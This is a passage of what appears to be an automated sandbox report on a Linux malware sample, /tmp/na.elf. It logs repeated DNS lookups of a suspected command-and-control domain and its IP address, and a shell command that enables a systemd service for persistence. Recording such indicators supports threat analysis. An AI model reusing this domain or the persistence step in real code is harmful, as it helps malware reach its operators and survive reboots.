                                                  Oct 7, 2024 16:26:33.322660923 CEST53439168.8.8.8192.168.2.23
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 7, 2024 16:23:05.947390079 CEST192.168.2.238.8.8.80x2515Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:15.585419893 CEST192.168.2.238.8.8.80x660aStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:26.233362913 CEST192.168.2.238.8.8.80xb5dcStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:28.885267973 CEST192.168.2.238.8.8.80x155eStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:33.601608038 CEST192.168.2.238.8.8.80x4e3cStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:44.335958958 CEST192.168.2.238.8.8.80x25baStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:52.063297987 CEST192.168.2.238.8.8.80x17d0Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:00.695106983 CEST192.168.2.238.8.8.80x7a06Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:03.340233088 CEST192.168.2.238.8.8.80xce61Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:08.979034901 CEST192.168.2.238.8.8.80x7ffStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:19.602272987 CEST192.168.2.238.8.8.80xb8cfStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:25.247142076 CEST192.168.2.238.8.8.80x38aaStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:28.368073940 CEST192.168.2.238.8.8.80x315Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:39.014631987 CEST192.168.2.238.8.8.80x291cStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:50.673736095 CEST192.168.2.238.8.8.80x97e9Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:58.307435036 CEST192.168.2.238.8.8.80x8259Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:08.994214058 CEST192.168.2.238.8.8.80xc05Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:14.666665077 CEST192.168.2.238.8.8.80x62c2Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:17.293072939 CEST192.168.2.238.8.8.80xcd69Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:21.950159073 CEST192.168.2.238.8.8.80x5238Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:32.573446989 CEST192.168.2.238.8.8.80x8dc1Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:38.199171066 CEST192.168.2.238.8.8.80x1347Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:44.058237076 CEST192.168.2.238.8.8.80x8ccdStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:50.858520985 CEST192.168.2.238.8.8.80x3550Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:53.583554983 CEST192.168.2.238.8.8.80x9bc7Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:56.320736885 CEST192.168.2.238.8.8.80x18a4Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:00.953061104 CEST192.168.2.238.8.8.80x7842Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:04.686326027 CEST192.168.2.238.8.8.80x37e8Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:12.516211987 CEST192.168.2.238.8.8.80x885fStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:24.252969027 CEST192.168.2.238.8.8.80xc965Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:33.312412977 CEST192.168.2.238.8.8.80x6781Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 7, 2024 16:23:05.959692001 CEST8.8.8.8192.168.2.230x2515No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:15.595879078 CEST8.8.8.8192.168.2.230x660aNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:26.240405083 CEST8.8.8.8192.168.2.230xb5dcNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:28.892528057 CEST8.8.8.8192.168.2.230x155eNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:33.608918905 CEST8.8.8.8192.168.2.230x4e3cNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:44.346298933 CEST8.8.8.8192.168.2.230x25baNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:23:52.070578098 CEST8.8.8.8192.168.2.230x17d0No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:00.702564955 CEST8.8.8.8192.168.2.230x7a06No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:03.346813917 CEST8.8.8.8192.168.2.230xce61No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:08.986745119 CEST8.8.8.8192.168.2.230x7ffNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:19.609518051 CEST8.8.8.8192.168.2.230xb8cfNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:25.748636007 CEST8.8.8.8192.168.2.230x38aaNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:28.380978107 CEST8.8.8.8192.168.2.230x315No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:39.021981955 CEST8.8.8.8192.168.2.230x291cNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:50.680771112 CEST8.8.8.8192.168.2.230x97e9No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:24:58.314532995 CEST8.8.8.8192.168.2.230x8259No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:09.002285957 CEST8.8.8.8192.168.2.230xc05No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:14.673780918 CEST8.8.8.8192.168.2.230x62c2No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:17.299966097 CEST8.8.8.8192.168.2.230xcd69No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:21.958036900 CEST8.8.8.8192.168.2.230x5238No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:32.580842972 CEST8.8.8.8192.168.2.230x8dc1No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:38.208892107 CEST8.8.8.8192.168.2.230x1347No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:44.065411091 CEST8.8.8.8192.168.2.230x8ccdNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:50.865180969 CEST8.8.8.8192.168.2.230x3550No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:53.590786934 CEST8.8.8.8192.168.2.230x9bc7No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:25:56.327975988 CEST8.8.8.8192.168.2.230x18a4No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:01.064019918 CEST8.8.8.8192.168.2.230x7842No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:04.694154978 CEST8.8.8.8192.168.2.230x37e8No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:12.524727106 CEST8.8.8.8192.168.2.230x885fNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:24.671441078 CEST8.8.8.8192.168.2.230xc965No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 16:26:33.322660923 CEST8.8.8.8192.168.2.230x6781No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false

                                                  System Behavior

                                                  Start time (UTC):14:23:04
                                                  Start date (UTC):07/10/2024
                                                  Path:/tmp/na.elf
                                                  Arguments:/tmp/na.elf
                                                  File size:4956856 bytes
                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                  Start time (UTC):14:23:05
                                                  Start date (UTC):07/10/2024
                                                  Path:/tmp/na.elf
                                                  Arguments:-
                                                  File size:4956856 bytes
                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                  Start time (UTC):14:23:05
                                                  Start date (UTC):07/10/2024
                                                  Path:/tmp/na.elf
                                                  Arguments:-
                                                  File size:4956856 bytes
                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                  Start time (UTC):14:23:05
                                                  Start date (UTC):07/10/2024
                                                  Path:/bin/sh
                                                  Arguments:/bin/sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):14:23:05
                                                  Start date (UTC):07/10/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):14:23:05
                                                  Start date (UTC):07/10/2024
                                                  Path:/usr/bin/systemctl
                                                  Arguments:systemctl enable sbolo.service
                                                  File size:996584 bytes
                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                  Start time (UTC):14:23:05
                                                  Start date (UTC):07/10/2024
                                                  Path:/tmp/na.elf
                                                  Arguments:-
                                                  File size:4956856 bytes
                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                  Start time (UTC):14:23:05
                                                  Start date (UTC):07/10/2024
                                                  Path:/usr/lib/systemd/systemd
                                                  Arguments:-
                                                  File size:1620224 bytes
                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                  Start time (UTC):14:23:05
                                                  Start date (UTC):07/10/2024
                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  File size:22760 bytes
                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e